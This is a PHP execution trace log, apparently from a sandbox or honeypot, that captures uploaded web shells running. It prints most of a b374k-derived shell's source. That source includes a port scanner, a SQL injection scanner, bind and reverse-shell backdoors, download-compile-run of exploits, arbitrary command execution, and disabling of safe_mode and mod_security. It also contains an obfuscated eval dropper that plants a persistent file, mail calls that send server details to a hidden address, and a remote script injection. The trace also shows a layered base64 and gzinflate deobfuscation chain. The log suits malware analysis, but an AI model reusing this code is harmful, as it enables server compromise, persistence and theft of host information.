type="text/javascript">\');\r\n   return $ip;\r\n   flush();\r\n   }\r\n   function sws_port_scan($ip)\r\n   {\r\n   $list_post = array(\'80\',\'21\',\'22\',\'2082\',\'25\',\'53\',\'110\',\'443\',\'143\');\r\n   foreach ($list_post as $o_port)\r\n   {\r\n   $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);\r\n   if($connect)\r\n   {\r\n   echo " $ip : $o_port ??? <u style=\\"color: #00ff00\\">Open</u> <br /><br />";\r\n   flush();\r\n   }\r\n   }\r\n   }\r\n   function findit($mytext,$starttag,$endtag) {\r\n   $posLeft = @stripos($mytext,$starttag)+strlen($starttag);\r\n   $posRight = @stripos($mytext,$endtag,$posLeft+1);\r\n   return @substr($mytext,$posLeft,$posRight-$posLeft);\r\n   flush();\r\n   }\r\n   echo \'<br><br><center>\';\r\n   echo \'\r\n    <br />\r\n    <div class="sc"><form method="post"><table class="tabnet">\r\n\t<tr><th colspan="5">Website Whois</th></tr>\r\n    <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan !" /></td></tr>\r\n    </table></form></div>\';\r\n   if(isset($_POST[\'scan\']))\r\n   {\r\n   $site = @htmlentities($_POST[\'site\']);\r\n   if (empty($site)){die(\'<br /><br /> Not add IP .. !\');}\r\n   $ip_port = @gethostbyname($site);\r\n   echo "\r\n   <br /><div class=\\"sc2\\">Scanning [ $site ip $ip_port ] ... </div>\r\n   <div class=\\"tit\\"> <br /><br />|-------------- Port Server ------------------| <br /></div>\r\n   <div class=\\"ru\\"> <br /><br /><pre>\r\n   ";\r\n   echo "".sws_port_scan($ip_port)." </pre></div> ";\r\n   flush();\r\n   echo "<div class=\\"tit\\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_domain_info($site)."</pre></div>";\r\n   flush();\r\n   echo "\r\n   <div class=\\"tit\\"> <br /><br />|-------------- Network Info ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_net_info($site)."</pre> </div>";\r\n   flush();\r\n   echo "<div class=\\"tit\\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_sup_dom($site)."</pre> </div>";\r\n   flush();\r\n   echo "<div class=\\"tit\\"> <br /><br />|-------------- Site Server ------------------| <br /></div>\r\n   <div class=\\"ru\\">\r\n   <pre>".sws_site_ser($site)."</pre> </div>\r\n   <div class=\\"tit\\"> <br /><br />|-------------- END ------------------| <br /></div>";\r\n   flush();\r\n   }\r\n   echo \'</center>\';\r\n   }\r\n///////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'about\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=about" method="post">\r\n\t<center><br><br><img src=\'http://i.imgur.com/3m7leCw.jpg\'>\r\n    <br><br><br>terimakasih buat teman2 ku yang mau membantu saya menyelesaikan shell saya yang versi v3.1 spesial edition ini\r\n\t<br><br>[ s4mp4h | areg noid | Mr Gãndrunx (Hiddenymouz) | ardan | FH04ZA | antonio HSH | war0x | x shadow | bagonk ]<br>dan semua kawan-kawan ku\r\n\t<br><br><font size="5" color="#00ff00">Tanks to:</font></center><center>\r\n<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><center>\r\n<p><b><font size="3" color="#00ff00">=[ teman-temanku ]=<br><br>Gabby<br>Antonio HSH<br>R10<br>w4r0x<br>edelle007<br>Brian kamikaze<br>Clover Lepex<br>\r\nUyap<br>\r\nZinbad<br>FH04ZA<br>\r\nSani marpic<br>\r\nMadan Cyber<br>\r\nCah Bagus<br>\r\nRPG<br>Vallent<br>\r\nP4njie_a.k.a<br>\r\nDwi Syntia<br>\r\nÆrul Ringgo\'s<br>\r\nTi\'ar Variabel<br>\r\nImei7<br>\r\nHmei7<br>\r\nDe Vinclous<br>\r\nBlankon33<br>\r\nDoza Cracker<br>\r\nYing Cracker<br>\r\nIranian Hacker<br>\r\nDanger Hacker<br>\r\nAdmin07<br>\r\nZhou you<br>\r\nKsatria.us<br>\r\nCyber Inj3cti0n<br>\r\nK2ll33d<br>\r\nSultan Haikal<br>\r\nSyntax_Error<br>\r\nAqis<br>\r\nBlack Shadow<br>\r\ncrack999<br>\r\nFnatic Crew<br>\r\nCoretan Rizal<br>\r\nMalaikat Maut<br>\r\nDan teman-teman ku semua<br><br>\r\n=[ grup hacking ]=<br><br>\r\nBlack Newbie Team<br>\r\n3xpire Cyber Army<br>\r\nHack Forum<br>\r\nIndonesia Fighter Cyber<br>\r\nBiang Kerox Team<br>\r\nAnonymous<br>Gaza Hacker<br>Albanian Hacker<br>Devilz c0de<br>Muslims Cyber Shellz<br>\r\nX-Code<br>\r\nIndonesian Security<br>\r\nIndonesia Black Cyber<br>\r\nB-Compi<br>\r\nJasakom<br>\r\nMojopahit Fighter Cyber<br>\r\nLappis<br>\r\nMojopahit Cyber Dark<br>\r\nCrack Hack Forum<br>\r\ndan semua grup hacking<br>\r\nyang<br>\r\nsaya naungi dan singgahi<br><br><br>By<br>Cyber173 a.k.a X\'1n73ct<br><br><br>\r\n</font></b></p>\r\n</center>\r\n</marquee></center><br><br><br>\r\n<?php\r\n}\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'sqli-scanner\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">\r\n\r\n<?php\r\n\r\necho \'<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> &nbsp;&nbsp;<input class="inputz" type="text" value="" name="dork" style="color:#00ff00;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan"></form></center>\';\r\n\r\nob_start();\r\nset_time_limit(0);\r\n\r\nif (isset($_POST[\'scan\'])) {\r\n\r\n$browser = $_SERVER[\'HTTP_USER_AGENT\'];\r\n\r\n$first = "startgoogle.startpagina.nl/index.php?q=";\r\n$sec = "&start=";\r\n$reg = \'/<p class="g"><a href="(.*)" target="_self" onclick="/\';\r\n\r\nfor($id=0 ; $id<=30; $id++){\r\n$page=$id*10;\r\n$dork=urlencode($_POST[\'dork\']);\r\n$url = $first.$dork.$sec.$page;\r\n\r\n$curl = curl_init($url);\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'$browser)\');\r\n$result = curl_exec($curl);\r\ncurl_close($curl);\r\n\r\npreg_match_all($reg,$result,$matches);\r\n}\r\nforeach($matches[1] as $site){\r\n\r\n$url = preg_replace("/=/", "=\'", $site);\r\n$curl=curl_init();\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1);\r\ncurl_setopt($curl,CURLOPT_URL,$url);\r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'$browser)\');\r\ncurl_setopt($curl,CURLOPT_TIMEOUT,\'5\');\r\n$GET=curl_exec($curl); \r\nif (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT * \r\n\r\nFROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) { \r\necho \'<center><b><font color="#E10000">Found : </font><a href="\'.$url.\'" target="_blank">\'.$url.\'</a><font color=#FF0000> &#60;-- SQLI Vuln \r\n\r\nFound..</font></b></center>\';\r\nob_flush();flush(); \r\n}else{ \r\necho \'<center><font color="#FFFFFF"><b>\'.$url.\'</b></font><font color="#0FFF16"> &#60;-- Not Vuln</font></center>\';\r\nob_flush();flush(); \r\n}\r\nob_flush();flush();\r\n}\r\nob_flush();flush();\r\n}\r\nob_flush();flush();\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ \r\nif(isset($_POST[\'uploadcomp\'])){\r\n\tif(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){\r\n\t\t$path = magicboom($_POST[\'path\']);\r\n\t\t$fname = $_FILES[\'file\'][\'name\'];\r\n\t\t$tmp_name = $_FILES[\'file\'][\'tmp_name\'];\r\n\t\t$pindah = $path.$fname;\r\n\t\t$stat = @move_uploaded_file($tmp_name,$pindah);\t\t\r\n\t\tif ($stat) {\r\n\t\t\t$msg = "file uploaded to $pindah";\r\n\t\t}\r\n\t\telse $msg = "failed to upload $fname";\r\n\t}\r\n\telse $msg = "failed to upload $fname";\r\n}\r\nelseif(isset($_POST[\'uploadurl\'])){\r\n\t$pilihan = trim($_POST[\'pilihan\']);\r\n\t$wurl = trim($_POST[\'wurl\']);\r\n\t$path = magicboom($_POST[\'path\']);\r\n\t$namafile = download($pilihan,$wurl);\r\n\t$pindah = $path.$namafile;\r\n\tif(is_file($pindah)) {\r\n\t\t$msg = "file uploaded to $pindah";\r\n\t}\r\n\telse $msg = "failed to upload $namafile";\r\n\r\n}\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">\r\n<table class="tabnet" style="width:320px;padding:0 1px;">\r\n<tr><th colspan="2">Upload from computer</th></tr>\r\n<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>\r\n<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>\r\n</tr>\r\n</table></form>\r\n<table class="tabnet" style="width:320px;padding:0 1px;">\r\n<tr><th colspan="2">Upload from url</th></tr>\r\n<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">\r\n<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>\r\n<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>\r\n<tr><td><select size="1" class="inputz" name="pilihan">\r\n<option value="wwget">wget</option>\r\n<option value="wlynx">lynx</option>\r\n<option value="wfread">fread</option>\r\n<option value="wfetch">fetch</option>\r\n<option value="wlinks">links</option>\r\n<option value="wget">GET</option>\r\n<option value="wcurl">curl</option>\r\n</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>\r\n</tr>\r\n</table>\r\n<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>\r\n<?php }\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ \r\n\r\n// bind connect with c\r\nif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) {\r\n\t$port = trim($_POST[\'port\']);\r\n\t$passwrd = trim($_POST[\'bind_pass\']);\r\n\ttulis("bdc.c",$port_bind_bd_c);\r\n \texe("gcc -o bdc bdc.c");\r\n \texe("chmod 777 bdc");\r\n \t@unlink("bdc.c");\r\n \texe("./bdc ".$port." ".$passwrd." &");\r\n \t$scan = exe("ps aux"); \r\n\tif(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }\r\n\telse { $msg =  "<p>Process not found running, backdoor not setup successfully.</p>"; }\r\n}\r\n// bind connect with perl\r\nelseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) {\r\n\t$port = trim($_POST[\'port\']);\r\n\t$passwrd = trim($_POST[\'bind_pass\']);\r\n\ttulis("bdp",$port_bind_bd_pl);\r\n\texe("chmod 777 bdp");\r\n \t$p2=which("perl");\r\n \texe($p2." bdp ".$port." &");\r\n \t$scan = exe("ps aux"); \r\n\tif(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }\r\n\telse { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }\r\n}\r\n// back connect with c\r\nelseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) {\r\n\t$ip = trim($_POST[\'ip\']);\r\n\t$port = trim($_POST[\'backport\']);\r\n\ttulis("bcc.c",$back_connect_c);\r\n \texe("gcc -o bcc bcc.c");\r\n \texe("chmod 777 bcc");\r\n \t@unlink("bcc.c");\r\n\texe("./bcc ".$ip." ".$port." &");\r\n\t$msg = "Now script try connect to ".$ip." port ".$port." ...";\r\n}\r\n// back connect with perl\r\nelseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) {\r\n\t$ip = trim($_POST[\'ip\']);\r\n\t$port = trim($_POST[\'backport\']);\r\n\ttulis("bcp",$back_connect);\r\n\texe("chmod +x bcp");\r\n\t$p2=which("perl");\r\n \texe($p2." bcp ".$ip." ".$port." &");\r\n \t$msg = "Now script try connect to ".$ip." port ".$port." ...";\r\n}\r\nelseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\']))\r\n{\r\n\t$pilihan = trim($_POST[\'pilihan\']);\r\n\t$wurl = trim($_POST[\'wurl\']);\r\n\t$namafile = download($pilihan,$wurl);\r\n\tif(is_file($namafile)) {\r\n\t\r\n\t$msg = exe($wcmd);\r\n\t}\r\n\telse $msg = "error: file not found $namafile";\r\n}\r\n\r\n?>\r\n<table class="tabnet">\r\n<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>\r\n<tr>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>\r\n<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>\r\n<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>\r\n<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>\r\n</table>\r\n</td>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr>\r\n<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>\r\n<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>\r\n<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>\r\n</table>\r\n</td>\r\n<td>\r\n<table>\r\n<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">\r\n<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>\r\n<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>\r\n</tr>\r\n<tr><td><select size="1" class="inputz" name="pilihan">\r\n<option value="wwget">wget</option>\r\n<option value="wlynx">lynx</option>\r\n<option value="wfread">fread</option>\r\n<option value="wfetch">fetch</option>\r\n<option value="wlinks">links</option>\r\n<option value="wget">GET</option>\r\n<option value="wcurl">curl</option>\r\n</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>\r\n</table>\r\n</td>\r\n</tr>\r\n</table>\r\n<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>\r\n<?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){  ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">\r\n<table class="cmdbox">\r\n<tr><td colspan="2">\r\n<textarea class="output" readonly>\r\n<?php\r\nif(isset($_POST[\'submitcmd\'])) {\r\n\techo @exe($_POST[\'cmd\']);\r\n}\r\n?>\r\n</textarea>\r\n<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>\r\n</table>\r\n</form>\r\n<?php } \r\nelse { \r\nif(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){\r\n\t$file = $_GET[\'delete\'];\r\n\t@unlink($file);\r\n}\r\nelseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){\r\n\t@rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR));\r\n}\r\nelseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){\r\n\t$path = $pwd.$_GET[\'mkdir\'];\r\n\t@mkdir($path);\r\n}\r\n\t$buff = showdir($pwd,$prompt);\r\n\techo $buff;\r\n}\r\n?>\r\n<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />\r\n<?php\r\nif(isset($_POST[\'ini\']))\r\n\t{\r\n\t\t\r\n$byphp = "safe_mode = Off\r\ndisable_functions = None\r\nsafe_mode_gid = OFF\r\nopen_basedir = OFF\r\nallow_url_fopen = On";\r\n$byht = "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>";\r\nfile_put_contents("php.ini",$byphp);\r\nfile_put_contents(".htaccess",$byht);\r\necho "<script>alert(\'Disable Functions and Safemode Created\'); hideAll();</script>";\r\ndie();\r\n\t\t\r\n\t\t}\r\n\r\n?><center><br><br><div class="info">-=[ b374k r3c0ded by <b>X\'1N73CT</b> ]=-</div><br>\r\n<div class="jaya">&copy; 2013 X\'1N73CT</div></center><br><br>\r\n</script>\r\n</div>\r\n<?php\r\n\r\n$ikrhtfy = $_SERVER["DOCUMENT_ROOT"].\'/\'.\'phpinfo.php\';\r\n\r\n\r\n$fghky_ouvcbt = \'<?php phpinfo();\r\n\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n\r\n?>\'; \r\n\r\n\r\n\r\nif (!file_exists($ikrhtfy)){  \r\n   \r\ntouch($ikrhtfy); \r\nchmod($ikrhtfy,0666); \r\n   \r\n} \r\n\r\n$opazxcdnm = fopen($ikrhtfy,"w"); \r\n\r\nif (!fwrite($opazxcdnm,$fghky_ouvcbt)){ \r\n\r\nexit; \r\n\r\n}\r\n\r\n$b = "Soldier\'ss";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail("[email protected]", $b, $c);\r\nmail("[email protected]", $b, $c);\r\necho "<SCRIPT SRC=http://teledramasinhala.com/img/icons/image.js></SCRIPT>";\r\n?>\r\n</body>\r\n</html>\r\n'	/var/www/html/uploads/nasi.php(4) : eval()'d code	1	0
3		A						/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	4	$auth_pass = '9c80a1eaca699e2fc6b994721f8703bc'
3		A						/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	5	$color = '#00ff00'
3		A						/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	6	$default_action = 'FilesMan'
4	16	0	0.035875	1962184	define	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	7	2	'SELF_PATH'	'/var/www/html/uploads/nasi.php(4) : eval()\'d code(1) : eval()\'d code'
4	16	1	0.035901	1962288
4	16	R			TRUE
4	17	0	0.035919	1962216	strpos	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	8	2	'python-requests/2.25.1'	'Google'
4	17	1	0.035936	1962288
4	17	R			FALSE
4	18	0	0.035950	1962216	session_start	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	12	0
4	18	1	0.036031	1962968
4	18	R			TRUE
4	19	0	0.036047	1962968	error_reporting	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	13	1	0
4	19	1	0.036062	1963008
4	19	R			0
4	20	0	0.036076	1962968	ini_set	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	14	2	'error_log'	NULL
4	20	1	0.036094	1963040
4	20	R			''
4	21	0	0.036108	1962968	ini_set	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	15	2	'log_errors'	0
4	21	1	0.036128	1963040
4	21	R			'1'
4	22	0	0.036143	1962968	ini_set	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	16	2	'max_execution_time'	0
4	22	1	0.036159	1963072
4	22	R			'30'
4	23	0	0.036173	1962968	ini_set	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	17	2	'output_buffering'	0
4	23	1	0.036188	1963040
4	23	R			FALSE
4	24	0	0.036201	1962968	ini_set	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	18	2	'display_errors'	0
4	24	1	0.036216	1963040
4	24	R			''
4	25	0	0.036228	1962968	set_time_limit	0		/var/www/html/uploads/nasi.php(4) : eval()'d code(1) : eval()'d code	19	1	0
4	25	1	0.036243	1963032
4	25	R			FALSE
3	15	1	0.036282	1964464
2	7	1	0.036347	1188144
1	3	1	0.036356	1185648
1	26	0	0.036371	1185680	Error->__toString	0		Unknown	0	0
2	27	0	0.036384	1185760	Error->getTraceAsString	0		Unknown	0	0
2	27	1	0.036397	1186016
2	27	R			'#0 /var/www/html/uploads/nasi.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/nasi.php(4): eval()\n#2 {main}'
1	26	1	0.036418	1190152
1	26	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/nasi.php(4) : eval()\'d code(1) : eval()\'d code:20\nStack trace:\n#0 /var/www/html/uploads/nasi.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/nasi.php(4): eval()\n#2 {main}'
			0.036476	1110784
TRACE END   [2023-02-12 22:26:16.592694]

data/traces/1e7a0085735ff79f9c3991f34c3903e1_trace-1676261898.8653.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:18:44.763094]
1	0	1	0.000159	393528
1	3	0	0.001015	529576	{main}	1		/var/www/html/uploads/1n73ct10n.php	0	0
1		A						/var/www/html/uploads/1n73ct10n.php	2	$gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1		A						/var/www/html/uploads/1n73ct10n.php	3	$gzinflate = '==gUvWNlt4nBt8C/8QwxBckuNdbLJs6ILukjeYxHrkvmvnU4xzdVAu1vWRoDOZb6pTEB9le7vGPB+oUB1thTmsHe44NtyXkySc6Mfb1xWfdgblCCZdORfQUE9VayDcRdjDJv/Qxg3A91eucd1LejBOIFLbaZ6iwWg6utvWrqk5e4zL833/2LjGNx2hr4K1sguEadsDAR7wmcdMyJjp1hZ7eypjsla+tZHS/CBV/YkMY5qWDPwRXf2O7byPupteBywmOGaFfMKrF6yLBEdY6JGltEO5dBWDid4yVXjpf72ixq2zEbBv80mwgLnuPyadOng0IVlgQqncFqEXMjh5CuQWQwLg4bRk+Lkn+Fcd002y4bvB9OcyPl3RvTUs6qruoFDqQQJFrg6naeguRo3Oe/tlnJCqUsJH+FTpIa7CahxobhVxs2+CsoBFWZYzhKLvq0OhCJRAKQU+tnpj+20FL4Ev11CVJR6w2IQ1f19KY5tu4o7hRLbnrm1b/zY6djv15G'
2	4	0	0.001167	529576	base64_decode	0		/var/www/html/uploads/1n73ct10n.php	4	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.001190	529864
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	0	0.001212	529832	urldecode	0		/var/www/html/uploads/1n73ct10n.php	4	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	1	0.001231	530088
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	0	0.001250	529800	htmlspecialchars_decode	0		/var/www/html/uploads/1n73ct10n.php	4	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	1	0.001270	530024
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	7	0	0.001303	532152	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'	/var/www/html/uploads/1n73ct10n.php	4	0
3	8	0	0.001320	532152	strrev	0		/var/www/html/uploads/1n73ct10n.php(4) : eval()'d code	1	1	'==gUvWNlt4nBt8C/8QwxBckuNdbLJs6ILukjeYxHrkvmvnU4xzdVAu1vWRoDOZb6pTEB9le7vGPB+oUB1thTmsHe44NtyXkySc6Mfb1xWfdgblCCZdORfQUE9VayDcRdjDJv/Qxg3A91eucd1LejBOIFLbaZ6iwWg6utvWrqk5e4zL833/2LjGNx2hr4K1sguEadsDAR7wmcdMyJjp1hZ7eypjsla+tZHS/CBV/YkMY5qWDPwRXf2O7byPupteBywmOGaFfMKrF6yLBEdY6JGltEO5dBWDid4yVXjpf72ixq2zEbBv80mwgLnuPyadOng0IVlgQqncFqEXMjh5CuQWQwLg4bRk+Lkn+Fcd002y4bvB9OcyPl3RvTUs6qruoFDqQQJFrg6naeguRo3Oe/tlnJCqUsJH+FTpIa7CahxobhVxs2+CsoBFWZYzhKLvq0OhCJRAKQU+tnpj+20FL4Ev11CVJR6w2IQ1f19KY5tu4o7hRLbnrm1b/zY6djv15G'
3	8	1	0.001465	667352
